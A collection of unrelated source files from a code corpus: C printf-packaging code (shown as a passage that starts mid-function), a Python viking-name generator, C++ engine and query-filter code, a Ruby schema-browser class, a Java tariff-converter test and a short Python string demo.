					str_ptr_pos[s_idx] = s_ptr_idx;
					if (is_ro) {
						/* flag read-only string. */
						str_ptr_pos[s_idx] |= STR_POS_RO_FLAG;
						s_ro_cnt++;
					} else {
						s_rw_cnt++;
					}
				} else if (is_ro || rws_pos_en) {
					/*
					 * Add only pointer position prefix
					 * when counting strings.
					 */
					len += 1;
				} else {
					/*
					 * Add the string length, the final '\0'
					 * and size of the pointer position prefix.
					 */
					len += strlen(s) + 1 + 1;
				}
				s_idx++;
			}

			buf += sizeof(char *);
		} else if (size == sizeof(int)) {
			int v = va_arg(ap, int);

			if (buf0 != NULL) {
				*(int *)buf = v;
			}
			buf += sizeof(int);
		} else if (size == sizeof(long)) {
			long v = va_arg(ap, long);

			if (buf0 != NULL) {
				*(long *)buf = v;
			}
			buf += sizeof(long);
		} else if (size == sizeof(long long)) {
			long long v = va_arg(ap, long long);

			if (buf0 != NULL) {
				if (Z_CBPRINTF_VA_STACK_LL_DBL_MEMCPY) {
					memcpy(buf, &v, sizeof(long long));
				} else {
					*(long long *)buf = v;
				}
			}
			buf += sizeof(long long);
		} else {
			__ASSERT(false, "unexpected size %u", size);
			return -EINVAL;
		}
	}

	/*
	 * We remember the size of the argument list as a multiple of
	 * sizeof(int) and limit it to a 8-bit field. That means 1020 bytes
	 * worth of va_list, or about 127 arguments on a 64-bit system
	 * (twice that on 32-bit systems). That ought to be good enough.
	 */
	if (BUF_OFFSET / sizeof(int) > 255) {
		__ASSERT(false, "too many format args");
		return -EINVAL;
	}

	/*
	 * If all we wanted was to count required buffer size
	 * then we have it now.
	 */
	if (buf0 == NULL) {
		return BUF_OFFSET + len - CBPRINTF_PACKAGE_ALIGNMENT;
	}

	/* Clear our buffer header. We made room for it initially. */
	*(char **)buf0 = NULL;

	/* Record end of argument list. */
	buf0[0] = BUF_OFFSET / sizeof(int);

	if (rws_pos_en) {
		/* RW strings are not appended; record how many position
		 * indexes follow instead.
		 */
		buf0[1] = 0;
		buf0[3] = s_rw_cnt;
	} else {
		/* RW strings are appended; record the append counter. */
		buf0[1] = s_rw_cnt;
		buf0[3] = 0;
	}

	buf0[2] = s_ro_cnt;

	/* Store strings pointer locations of read only strings. */
	if (s_ro_cnt) {
		for (i = 0; i < s_idx; i++) {
			if (!(str_ptr_pos[i] & STR_POS_RO_FLAG)) {
				continue;
			}

			uint8_t pos = str_ptr_pos[i] & STR_POS_MASK;

			/* make sure it fits */
			if (BUF_OFFSET + 1 > len) {
				return -ENOSPC;
			}
			/* store the pointer position prefix */
			*buf++ = pos;
		}
	}

	/* Store strings prefixed by their pointer location. */
	for (i = 0; i < s_idx; i++) {
		/* Process only RW strings. */
		if (s_ro_cnt && str_ptr_pos[i] & STR_POS_RO_FLAG) {
			continue;
		}

		if (rws_pos_en) {
			size = 0;
		} else {
			/* retrieve the string pointer */
			s = *(char **)(buf0 + str_ptr_pos[i] * sizeof(int));
			/* clear the in-buffer pointer (less entropy if compressed) */
			*(char **)(buf0 + str_ptr_pos[i] * sizeof(int)) = NULL;
			/* find the string length including terminating '\0' */
			size = strlen(s) + 1;
		}

		/* make sure it fits */
		if (BUF_OFFSET + 1 + size > len) {
			return -ENOSPC;
		}

		/* store the pointer position prefix */
		*buf++ = str_ptr_pos[i];

		/* copy the string with its terminating '\0' */
		memcpy(buf, s, size);
		buf += size;
	}

	/*
	 * TODO: remove pointers for appended strings since they're useless.
	 * TODO: explore leveraging same mechanism to remove alignment padding
	 */

	return BUF_OFFSET;

#undef BUF_OFFSET
#undef STR_POS_RO_FLAG
#undef STR_POS_MASK
}

/* Variadic convenience wrapper around cbvprintf_package(). */
int cbprintf_package(void *packaged, size_t len, uint32_t flags,
		     const char *format, ...)
{
	va_list ap;
	int ret;

	va_start(ap, format);
	ret = cbvprintf_package(packaged, len, flags, format, ap);
	va_end(ap);

	return ret;
}

/* Re-hydrate a package: patch the string pointers back in, rebuild a
 * va_list over the argument area and hand it to the external formatter.
 */
int cbpprintf_external(cbprintf_cb out,
		       cbvprintf_exteral_formatter_func formatter,
		       void *ctx,
		       void *packaged)
{
	uint8_t *buf = packaged;
	char *fmt, *s, **ps;
	unsigned int i, args_size, s_nbr, ros_nbr, rws_nbr, s_idx;

	if (buf == NULL) {
		return -EINVAL;
	}

	/* Retrieve the size of the arg list and number of strings. */
	args_size = buf[0] * sizeof(int);
	s_nbr = buf[1];
	ros_nbr = buf[2];
	rws_nbr = buf[3];

	/* Locate the string table */
	s = (char *)(buf + args_size + ros_nbr + rws_nbr);

	/*
	 * Patch in string pointers.
	 */
	for (i = 0; i < s_nbr; i++) {
		/* Locate pointer location for this string */
		s_idx = *(uint8_t *)s++;
		ps = (char **)(buf + s_idx * sizeof(int));
		/* update the pointer with current string location */
		*ps = s;
		/* move to next string */
		s += strlen(s) + 1;
	}

	/* Retrieve format string */
	fmt = ((char **)buf)[1];

	/* skip past format string pointer */
	buf += sizeof(char *) * 2;

	/* Turn this into a va_list and print it */
	return cbprintf_via_va_list(out, formatter, ctx, fmt, buf);
}

/* Copy a package via the convert callback, optionally appending read-only
 * and/or read-write strings (per `flags`) so the result is self-contained.
 * With cb == NULL only the required output length is computed.
 */
int cbprintf_package_convert(void *in_packaged,
			     size_t in_len,
			     cbprintf_convert_cb cb,
			     void *ctx,
			     uint32_t flags,
			     uint16_t *strl,
			     size_t strl_len)
{
	__ASSERT_NO_MSG(in_packaged != NULL);

	uint8_t *buf = in_packaged;
	uint32_t *buf32 = in_packaged;
	unsigned int args_size, ros_nbr, rws_nbr;
	bool rw_cpy;
	bool ro_cpy;
	struct z_cbprintf_desc *in_desc = in_packaged;

	in_len = in_len != 0 ? in_len : get_package_len(in_packaged);

	/* Get number of RO string indexes in the package and check if copying
	 * includes appending those strings.
	 */
	ros_nbr = in_desc->ro_str_cnt;
	ro_cpy = ros_nbr &&
		(flags & CBPRINTF_PACKAGE_COPY_RO_STR) == CBPRINTF_PACKAGE_COPY_RO_STR;

	/* Get number of RW string indexes in the package and check if copying
	 * includes appending those strings.
	 */
	rws_nbr = in_desc->rw_str_cnt;
	rw_cpy = rws_nbr > 0 &&
		 (flags & CBPRINTF_PACKAGE_COPY_RW_STR) == CBPRINTF_PACKAGE_COPY_RW_STR;

	/* If flags are not set or appending request without rw string indexes
	 * present is chosen, just do a simple copy (or length calculation).
	 * Assuming that it is the most common case.
	 */
	if (!rw_cpy && !ro_cpy) {
		if (cb) {
			cb(in_packaged, in_len, ctx);
		}

		return in_len;
	}

	/* If we got here, it means that coping will be more complex and will be
	 * done with strings appending.
	 * Retrieve the size of the arg list.
	 */
	args_size = in_desc->len * sizeof(int);

	int out_len;

	/* Pointer to array with string locations. Array starts with read-only
	 * string locations.
	 */
	uint8_t *str_pos = &buf[args_size];
	size_t strl_cnt = 0;

	/* If null destination, just calculate output length. */
	if (cb == NULL) {
		out_len = (int)in_len;
		if (ro_cpy) {
			for (int i = 0; i < ros_nbr; i++) {
				const char *str = *(const char **)&buf32[*str_pos];
				int len = append_string(cb, NULL, str, 0);

				/* If possible store calculated string length. */
				if (strl && strl_cnt < strl_len) {
					strl[strl_cnt++] = (uint16_t)len;
				}
				out_len += len;
				str_pos++;
			}
		} else {
			if (ros_nbr && flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) {
				str_pos += ros_nbr;
			}
		}

		bool drop_ro_str_pos = !(flags &
					(CBPRINTF_PACKAGE_COPY_KEEP_RO_STR |
					 CBPRINTF_PACKAGE_COPY_RO_STR));

		/* Handle RW strings. */
		for (int i = 0; i < rws_nbr; i++) {
			const char *str = *(const char **)&buf32[*str_pos];
			bool is_ro = ptr_in_rodata(str);

			if ((is_ro && flags & CBPRINTF_PACKAGE_COPY_RO_STR) ||
			    (!is_ro && flags & CBPRINTF_PACKAGE_COPY_RW_STR)) {
				int len = append_string(cb, NULL, str, 0);

				/* If possible store calculated string length. */
				if (strl && strl_cnt < strl_len) {
					strl[strl_cnt++] = (uint16_t)len;
				}
				out_len += len;
			}

			if (is_ro && drop_ro_str_pos) {
				/* If read-only string location is dropped decreased
				 * length.
				 */
				out_len--;
			}

			str_pos++;
		}

		return out_len;
	}

	struct z_cbprintf_desc out_desc;
	/* At least one is copied in. */
	uint8_t cpy_str_pos[16];
	/* Up to one will be kept since if both types are kept it returns earlier. */
	uint8_t keep_str_pos[16];
	uint8_t scpy_cnt;
	uint8_t keep_cnt;
	uint8_t *dst;
	int rv;

	/* If read-only strings shall be appended to the output package copy
	 * their indexes to the local array, otherwise indicate that indexes
	 * shall remain in the output package.
	 */
	if (ro_cpy) {
		scpy_cnt = ros_nbr;
		keep_cnt = 0;
		dst = cpy_str_pos;
	} else if (ros_nbr && flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) {
		scpy_cnt = 0;
		keep_cnt = ros_nbr;
		dst = keep_str_pos;
	} else {
		scpy_cnt = 0;
		keep_cnt = 0;
		dst = NULL;
	}
	if (dst) {
		memcpy(dst, str_pos, ros_nbr);
	}
	str_pos += ros_nbr;

	/* Go through read-write strings and identify which shall be appended.
	 * Note that there may be read-only strings there. Use address evaluation
	 * to determine if strings is read-only.
	 */
	for (int i = 0; i < rws_nbr; i++) {
		const char *str = *(const char **)&buf32[*str_pos];
		bool is_ro = ptr_in_rodata(str);

		if (is_ro) {
			if (flags & CBPRINTF_PACKAGE_COPY_RO_STR) {
				__ASSERT_NO_MSG(scpy_cnt < sizeof(cpy_str_pos));
				cpy_str_pos[scpy_cnt++] = *str_pos;
			} else if (flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) {
				__ASSERT_NO_MSG(keep_cnt < sizeof(keep_str_pos));
				keep_str_pos[keep_cnt++] = *str_pos;
			} else {
				/* Drop information about ro_str location. */
			}
		} else {
			if (flags & CBPRINTF_PACKAGE_COPY_RW_STR) {
				__ASSERT_NO_MSG(scpy_cnt < sizeof(cpy_str_pos));
				cpy_str_pos[scpy_cnt++] = *str_pos;
			} else {
				__ASSERT_NO_MSG(keep_cnt < sizeof(keep_str_pos));
				keep_str_pos[keep_cnt++] = *str_pos;
			}
		}
		str_pos++;
	}

	/* Set amount of strings appended to the package. */
	out_desc.len = in_desc->len;
	out_desc.str_cnt = in_desc->str_cnt + scpy_cnt;
	out_desc.rw_str_cnt = (flags & CBPRINTF_PACKAGE_COPY_RW_STR) ? 0 : keep_cnt;
	out_desc.ro_str_cnt = (flags & CBPRINTF_PACKAGE_COPY_RO_STR) ? 0 :
			((flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) ? keep_cnt : 0);

	/* Temporary overwrite input descriptor to allow bulk transfer */
	struct z_cbprintf_desc in_desc_backup = *in_desc;
	*in_desc = out_desc;

	/* Copy package header and arguments. */
	rv = cb(in_packaged, args_size, ctx);
	if (rv < 0) {
		return rv;
	}
	out_len = rv;
	/* Restore input descriptor. */
	*in_desc = in_desc_backup;

	/* Copy string positions which are kept. */
	rv = cb(keep_str_pos, keep_cnt, ctx);
	if (rv < 0) {
		return rv;
	}
	out_len += rv;

	/* Copy appended strings from source package to destination. */
	size_t strs_len = in_len - (args_size + ros_nbr + rws_nbr);

	rv = cb(str_pos, strs_len, ctx);
	if (rv < 0) {
		return rv;
	}
	out_len += rv;

	/* Append strings */
	for (int i = 0; i < scpy_cnt; i++) {
		uint8_t loc = cpy_str_pos[i];
		const char *str = *(const char **)&buf32[loc];
		uint16_t str_len = strl ? strl[i] : 0;

		rv = cb(&loc, 1, ctx);
		if (rv < 0) {
			return rv;
		}
		out_len += rv;

		rv = append_string(cb, ctx, str, str_len);
		if (rv < 0) {
			return rv;
		}
		out_len += rv;
	}

	/* Empty call (can be interpreted as flushing) */
	(void)cb(NULL, 0, ctx);

	return out_len;
}
JohannesBuchner/pystrict3
tests/expect-fail23/recipe-83206.py
#!/usr/bin/env python
"""Print a randomly assembled "viking name", seeded from the user's input.

Fix: the original did ``from string import split`` — the ``string`` module's
function form was removed in Python 3, yet the script already used Python 3
``print(..., end=...)``.  The lists are now built with ``str.split``,
producing exactly the same contents in the same order.
"""

# Whitespace-separated word pools (default split() ignores the surrounding
# blank lines).
first_name = """
chet
<NAME>
ethel
<NAME>
""".split()

last_name = """
milquetoast
roth
bumstead
toodles
menderchuck
""".split()

er = """
killer
slayer
smiter
destroyer
defenestrator
""".split()

p = """
of
""".split()

# These two pools contain multi-word entries, so they are split on newlines
# (no leading newline in the literal — the first entry starts immediately).
adj = """very small
tiny
non-combatant
defenseless""".split('\n')

n = """reindeer
bunnies
probate-attorneys
inanimate objects
fruit""".split('\n')

# One choice is drawn from each pool, in this order.
name = [first_name, last_name, [','], er, p, adj, n]

if __name__ == '__main__':
    import random

    # Seed deterministically from the typed name so the same input yields
    # the same viking name within one interpreter session (str hashes are
    # randomized per process unless PYTHONHASHSEED is set).
    try:
        i = hash(input('enter your name:'))
    except Exception:
        # Preserve the original fallback seed on any input failure.
        i = 35
    random.seed(i)

    print('your viking name is', end=' ')
    for part in [random.choice(pool) for pool in name]:
        print(part, end=' ')
nfwGytautas/GLEngine-v2
OpenGL Engine/src/components/Component.h
#pragma once

#include <cstddef>      // std::size_t for ComponentID (was relied on transitively)
#include <type_traits>  // std::is_base_of for the compile-time check below

class Entity;

// Base class for all entity components.  Lifecycle hooks are no-ops by
// default; derived components override only what they need.
struct Component
{
	// Owning entity; set externally after construction (nullptr until then).
	Entity* entity{ nullptr };

	//This method is called after construction of the component
	virtual void init() {}
	//This method is called after every update cycle
	virtual void update(float frameTime) {}
	//This method is called before every render cycle
	virtual void preRender() {}
	//This method is called during every render cycle
	virtual void render() {}
	//This method is called after every render cycle
	virtual void postRender() {}

	//Required for blueprints — derived classes must override to copy their
	//own type (note: the copy shares the same `entity` pointer).
	virtual Component* clone() { return new Component(*this); }

	// Defaulted virtual destructor so deletion through a Component* is safe.
	virtual ~Component() = default;
};

using ComponentID = std::size_t;

// Returns a new unique id on each call (defined in the implementation file).
ComponentID getUniqueComponentID() noexcept;

// Returns a process-wide stable id for component type T.  The id is assigned
// on first call per T (function-local static) and reused afterwards.
template<typename T>
ComponentID getComponentTypeID() noexcept
{
	static_assert(std::is_base_of<Component, T>::value, "T must inherit from Component");
	static ComponentID typeID{ getUniqueComponentID() };
	return typeID;
}
PublicHealthEngland/data_management_system
lib/schema_browser/category_choice.rb
<filename>lib/schema_browser/category_choice.rb
module SchemaBrowser
  # Build Category Choice nodes if applicable
  class CategoryChoice
    include Nodes::Utility
    include SchemaBrowser::Utility
    include SchemaBrowser::UtilityCategory

    attr_accessor :zipfile, :html, :node, :dataset, :version

    # Accumulates the generated HTML for one category-choice node and
    # renders it immediately (see #build).
    # @param zipfile destination archive for #save_file
    # @param node schema node whose category choices are rendered
    def initialize(zipfile, node)
      @zipfile = zipfile
      @html = ''
      @depth = 0
      @index = false
      @node = node
      @version = node.dataset_version
      @dataset = version.dataset

      build
    end

    # Renders the full HTML page skeleton (head, body, navbar) around the
    # category choice table, appending markup to @html via the tag DSL.
    def build
      tag(:html) do
        head_common
        body_common do
          body_container_common do
            navbar
            category_choice_content
          end
        end
      end
    end

    # Emits one table row per (category, child node) combination, ordered by
    # each collection's sort attribute.
    def category_choice_content
      tag(:div, id: 'content', class: 'row') do
        tag(:div, class: 'span12') do
          category_table do
            node.child_nodes.sort_by(&:sort).each do |child_node|
              version.categories.sort_by(&:sort).pluck(:name).each do |category_name|
                # Row label is the category name concatenated with the child
                # element name (e.g. "<Category><ElementName>").
                table_row_category("#{category_name}#{child_node.xsd_element_name}")
              end
            end
          end
        end
      end
      tag(:div, id: 'push')
    end

    # Writes the accumulated HTML into the schema-pack zip under
    # schema_browser/Tabular/.
    def save_file
      filename = "schema_browser/Tabular/#{node.xsd_element_name}.html"
      save_schema_pack_file(html, filename, zipfile)
    end
  end
end
UnionInternationalCheminsdeFer/OSDM-Converter
GTM data converter.tests/src/Gtm/converter/tests/TransitSeriesBorderPointTest.java
package Gtm.converter.tests;

import org.junit.Before;
import org.junit.Test;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.Mockito;
import org.mockito.MockitoAnnotations;

import Gtm.ConnectionPoint;
import Gtm.GTMTool;
import Gtm.GtmFactory;
import Gtm.Legacy108Station;
import Gtm.LegacyCalculationType;
import Gtm.LegacySeries;
import Gtm.LegacySeriesType;
import Gtm.RegionalConstraint;
import Gtm.ViaStation;
import Gtm.converter.ConverterFromLegacy;
import Gtm.converter.ConverterToLegacy;
import Gtm.converter.tests.dataFactories.LegacyDataFactory;
import Gtm.converter.tests.mocks.MockedEditingDomain;
import Gtm.converter.tests.mocks.MockedProgressMonitor;
import Gtm.converter.tests.utils.TestUtils;
import Gtm.utils.GtmUtils;

/**
 * Round-trip test for a TRANSIT legacy series whose end points are border
 * stations: legacy 108 data is converted to the OSDM model
 * (ConverterFromLegacy) and back (ConverterToLegacy), asserting that border
 * point codes, connection points and the series end stations survive both
 * directions unchanged.
 *
 * NOTE: assertions use the {@code assert} keyword, so the test is only
 * effective when the JVM runs with {@code -ea}.
 */
public class TransitSeriesBorderPointTest {

	GTMTool tool = null;

	// Border point codes assigned to the two frontier stations.
	int borderPointCodeA = 10;
	int borderPointCodeG = 20;

	// Legacy station codes used by the fixture.
	int legacyBorderStationCodeA = 1000; //A-Town (GR)
	int legacyBorderStationCodeG = 2000; //G-Town (GR)
	int legacyNonBorderStationCodeA = 1; //A-Town
	int legacyNonBorderStationCodeG = 7; //G-Town

	@Mock
	GtmUtils gtmUtilsMock;
	@InjectMocks
	ConverterFromLegacy converter2osdm;
	@InjectMocks
	ConverterToLegacy converter2legacy;

	/**
	 * Builds the legacy fixture (4 stations, 2 border points, 1 TRANSIT
	 * series between the two border stations) and runs the legacy-to-OSDM
	 * conversion so each test starts from a converted model.
	 */
	@Before
	public void setUp() throws Exception {
		MockitoAnnotations.initMocks(this);
		tool = LegacyDataFactory.createBasicData();

		//set legacy stations
		tool.getConversionFromLegacy().getLegacy108().setLegacyStations(GtmFactory.eINSTANCE.createLegacy108Stations());
		Legacy108Station ls1 = GtmFactory.eINSTANCE.createLegacy108Station();
		ls1 = LegacyDataFactory.createStation("A-Town","A-Town","A",legacyNonBorderStationCodeA,0,0);
		tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls1);
		Legacy108Station ls2 = GtmFactory.eINSTANCE.createLegacy108Station();
		ls2 = LegacyDataFactory.createStation("A-Town (GR)","A-Town (GR)","A (GR)",legacyBorderStationCodeA,borderPointCodeA,0);
		tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls2);
		Legacy108Station ls3 = GtmFactory.eINSTANCE.createLegacy108Station();
		ls3 = LegacyDataFactory.createStation("G-Town","G-Town","G",legacyNonBorderStationCodeG,0,0);
		tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls3);
		Legacy108Station ls4 = GtmFactory.eINSTANCE.createLegacy108Station();
		ls4 = LegacyDataFactory.createStation("G-Town (GR)","G-Town (GR)","G (GR)",legacyBorderStationCodeG,borderPointCodeG,0);
		tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls4);

		LegacyDataFactory.addStation(tool, "A-TOWN", "10000",TestUtils.findCountry(tool,99));
		LegacyDataFactory.addStation(tool, "G-TOWN", "20000",TestUtils.findCountry(tool,99));

		//set border point 1
		tool.getConversionFromLegacy().getLegacy108().setLegacyBorderPoints(GtmFactory.eINSTANCE.createLegacyBorderPoints());
		LegacyDataFactory.addBorderPoint(tool,borderPointCodeA,"9999",99,legacyBorderStationCodeA,"00001","9995",98,10000,"10000");
		//set border point 2
		LegacyDataFactory.addBorderPoint(tool,borderPointCodeG,"9999",99,legacyBorderStationCodeG,"00007","9996",97,20000,"20000");

		//series A-Town to A-Town (GR)
		tool.getConversionFromLegacy().getLegacy108().setLegacySeriesList(GtmFactory.eINSTANCE.createLegacySeriesList());
		LegacySeries s = GtmFactory.eINSTANCE.createLegacySeries();
		s.setCarrierCode("9999");
		s.setDistance1(10);
		s.setDistance2(10);
		s.setFareTableNumber(1);
		s.setFromStation(legacyBorderStationCodeA);
		s.setToStation(legacyBorderStationCodeG);
		s.setNumber(1);
		s.setPricetype(LegacyCalculationType.ROUTE_BASED);
		s.setSupplyingCarrierCode("9999");
		s.setType(LegacySeriesType.TRANSIT);
		s.setValidFrom(TestUtils.getFromDate());
		s.setValidUntil(TestUtils.getUntilDate());
		tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().add(s);

		gtmUtilsMock = Mockito.mock(GtmUtils.class);
		converter2osdm = new ConverterFromLegacy(tool, new MockedEditingDomain(), null);

		//prepare codelists
		converter2osdm.initializeConverter();
		//convert
		converter2osdm.convertToGtmTest(new MockedProgressMonitor());
	}

	/**
	 * Verifies the converted OSDM model (counts, connection points, entry/exit
	 * border point codes per direction), then converts back to legacy and
	 * checks the single TRANSIT series and both border stations are restored.
	 */
	@Test
	public void testTransitNonMeritsBorderStationConversion() {

		//validate basics
		//one calendar
		assert(tool.getGeneralTariffModel().getFareStructure().getCalendars().getCalendars().size() == 1);

		//one regional constraint per series * 2
		assert(tool.getGeneralTariffModel().getFareStructure().getRegionalConstraints().getRegionalConstraints().size() ==
				tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().size() * 2 //route and return route
			);

		// number of fares = number of series * 2 * number of templates
		assert(tool.getGeneralTariffModel().getFareStructure().getFareElements().getFareElements().size() ==
				tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().size() * 2 // route and return route
				* tool.getConversionFromLegacy().getParams().getLegacyFareTemplates().getFareTemplates().size()
			);

		// number of prices
		assert(tool.getGeneralTariffModel().getFareStructure().getPrices().getPrices().size() == 2);

		// one connection point per border point, each joining two station sets
		assert(tool.getGeneralTariffModel().getFareStructure().getConnectionPoints() != null);
		assert(tool.getGeneralTariffModel().getFareStructure().getConnectionPoints().getConnectionPoints().size() == 2);
		for (ConnectionPoint p : tool.getGeneralTariffModel().getFareStructure().getConnectionPoints().getConnectionPoints()) {
			assert(p.getConnectedStationSets().size() == 2);
			assert(p.getLegacyBorderPointCode() == borderPointCodeA || p.getLegacyBorderPointCode() == borderPointCodeG);
		}

		// outbound route enters at A and exits at G; the return route is mirrored
		for (RegionalConstraint r : tool.getGeneralTariffModel().getFareStructure().getRegionalConstraints().getRegionalConstraints()) {
			if (!TestUtils.isReturnRoute(r)) {
				assert(r.getExitConnectionPoint().getLegacyBorderPointCode() == borderPointCodeG);
				assert(r.getEntryConnectionPoint().getLegacyBorderPointCode() == borderPointCodeA);
				ViaStation route = r.getRegionalValidity().get(0).getViaStation();
				assert (route.getRoute().getStations().size() == 2);
			} else {
				assert(r.getExitConnectionPoint().getLegacyBorderPointCode() == borderPointCodeA);
				assert(r.getEntryConnectionPoint().getLegacyBorderPointCode() == borderPointCodeG);
				ViaStation route = r.getRegionalValidity().get(0).getViaStation();
				assert (route.getRoute().getStations().size() == 2);
			}
		}

		//prepare for return conversion
		TestUtils.resetLegacy(tool);
		tool.getGeneralTariffModel().setDelivery(GtmFactory.eINSTANCE.createDelivery());
		tool.getGeneralTariffModel().getDelivery().setProvider(TestUtils.findCarrier(tool, "9999"));
		converter2legacy = new ConverterToLegacy(tool, null, new MockedEditingDomain());

		//convert
		converter2legacy.convertTest(new MockedProgressMonitor());

		// exactly the one original series must come back
		assert(tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList() != null);
		assert(tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries() != null);
		assert(tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().size() == 1);

		LegacySeries s = tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().get(0);
		assert(s.getFromStation() == legacyBorderStationCodeA);
		assert(s.getToStation() == legacyBorderStationCodeG);
		assert(s.getType().equals(LegacySeriesType.TRANSIT));

		// both end stations must be restored as border stations with their codes
		Legacy108Station borderStation1 = TestUtils.findLegacyStation(tool,s.getFromStation());
		Legacy108Station borderStation2 = TestUtils.findLegacyStation(tool,s.getToStation());

		assert(borderStation1 != null);
		assert(borderStation1.getStationCode() == legacyBorderStationCodeA);
		assert(borderStation1.getBorderPointCode() == borderPointCodeA);
		assert(borderStation1.getName().equals("A-Town (GR)"));

		assert(borderStation2 != null);
		assert(borderStation2.getStationCode() == legacyBorderStationCodeG);
		assert(borderStation2.getBorderPointCode() == borderPointCodeG);
		assert(borderStation2.getName().equals("G-Town (GR)"));
	}
}
villoro/villoro_posts
0005-strings_python/4_string_builtin_functions.py
# Demo of str built-ins: case conversions first, then a divider line,
# then the three whitespace-trimming variants.
text = "heLLo world"
for converted in (text.upper(), text.lower(), text.title()):
    print(converted)

print("-" * 50)

text = "\n hello\r\t"
for trimmed in (text.strip(), text.lstrip(), text.rstrip()):
    print(trimmed)
phaazon/lib-ledger-core
ledger-core/src/core/database/query/QueryFilter.cpp
/* * * QueryFilter * ledger-core * * Created by <NAME> on 28/06/2017. * * The MIT License (MIT) * * Copyright (c) 2016 Ledger * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. 
 * */

#include <core/database/query/CompoundQueryFilter.hpp>
#include <core/database/query/QueryFilter.hpp>
#include <core/utils/Exception.hpp>

namespace ledger {
    namespace core {

        // The op_* helpers append `filter` to this chain with the matching
        // boolean operator; each returns the new tail for call chaining.
        std::shared_ptr<api::QueryFilter> QueryFilter::op_and(const std::shared_ptr<api::QueryFilter> &filter) {
            return link(filter, QueryFilterOperator::OP_AND);
        }

        std::shared_ptr<api::QueryFilter> QueryFilter::op_or(const std::shared_ptr<api::QueryFilter> &filter) {
            return link(filter, QueryFilterOperator::OP_OR);
        }

        std::shared_ptr<api::QueryFilter> QueryFilter::op_and_not(const std::shared_ptr<api::QueryFilter> &filter) {
            return link(filter, QueryFilterOperator::OP_AND_NOT);
        }

        std::shared_ptr<api::QueryFilter> QueryFilter::op_or_not(const std::shared_ptr<api::QueryFilter> &filter) {
            return link(filter, QueryFilterOperator::OP_OR_NOT);
        }

        // NOTE(review): despite the name this walks from the head and counts
        // every filter in the whole chain (including this one), so a lone
        // filter yields 1 and any linked chain yields > 1 — which is exactly
        // how link() uses it below.
        int32_t QueryFilter::getSiblingsCount() const {
            auto count = 0;
            auto ptr = getHead();
            while (ptr != nullptr) {
                ptr = ptr->_siblings.next;
                count += 1;
            }
            return count;
        }

        // Appends `filter` after this node. Only a tail may be linked; a
        // filter that is itself a chain (count > 1) is wrapped in a
        // CompoundQueryFilter so it joins as a single node.
        std::shared_ptr<api::QueryFilter> QueryFilter::link(const std::shared_ptr<api::QueryFilter> &filter, QueryFilterOperator op) {
            auto f = std::dynamic_pointer_cast<QueryFilter>(filter);
            std::shared_ptr<QueryFilter> newTail;
            if (!isTail()) {
                throw make_exception(api::ErrorCode::LINK_NON_TAIL_FILTER, "Cannot link already linked filter.");
            }
            if (f->getSiblingsCount() > 1) {
                // CREATE A COMPOUND FILTER
                newTail = std::make_shared<CompoundQueryFilter>(filter);
            } else {
                newTail = f;
            }
            // Splice the new node in: forward link + operator on this node,
            // back link on the new tail.
            _siblings.next = newTail;
            _siblings.op = op;
            newTail->_siblings.previous = shared_from_this();
            return newTail;
        }

        // A node is the tail when nothing follows it.
        bool QueryFilter::isTail() const {
            return _siblings.next == nullptr;
        }

        // Walk the previous-links back to the first node of the chain.
        std::shared_ptr<QueryFilter> QueryFilter::getHead() const {
            auto ptr = std::const_pointer_cast<QueryFilter>(shared_from_this());
            while (!ptr->isHead()) {
                ptr = ptr->_siblings.previous;
            }
            return ptr;
        }

        // Walk the next-links forward to the last node of the chain.
        std::shared_ptr<QueryFilter> QueryFilter::getTail() const {
            auto ptr = std::const_pointer_cast<QueryFilter>(shared_from_this());
            while (!ptr->isTail()) {
                ptr = ptr->_siblings.next;
            }
            return ptr;
        }

        // A node is the head when nothing precedes it.
        bool QueryFilter::isHead() const {
            return _siblings.previous == nullptr;
        }

        std::shared_ptr<QueryFilter> QueryFilter::getNext() const {
            return std::const_pointer_cast<QueryFilter>(shared_from_this())->_siblings.next;
        }

        std::shared_ptr<QueryFilter> QueryFilter::getPrevious() const {
            return std::const_pointer_cast<QueryFilter>(shared_from_this())->_siblings.previous;
        }

        // Operator joining this node to the one returned by getNext().
        QueryFilterOperator QueryFilter::getOperatorForNextFilter() const {
            return std::const_pointer_cast<QueryFilter>(shared_from_this())->_siblings.op;
        }
    }
}
opensource-assist/fuschia
garnet/bin/metric_broker/config/test/json_reader_test.cc
// Copyright 2019 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#include "garnet/bin/metric_broker/config/json_reader.h"

#include <algorithm>
#include <array>
#include <cstdint>
#include <fstream>
#include <memory>
#include <optional>
#include <string>
#include <string_view>

#include "gmock/gmock.h"
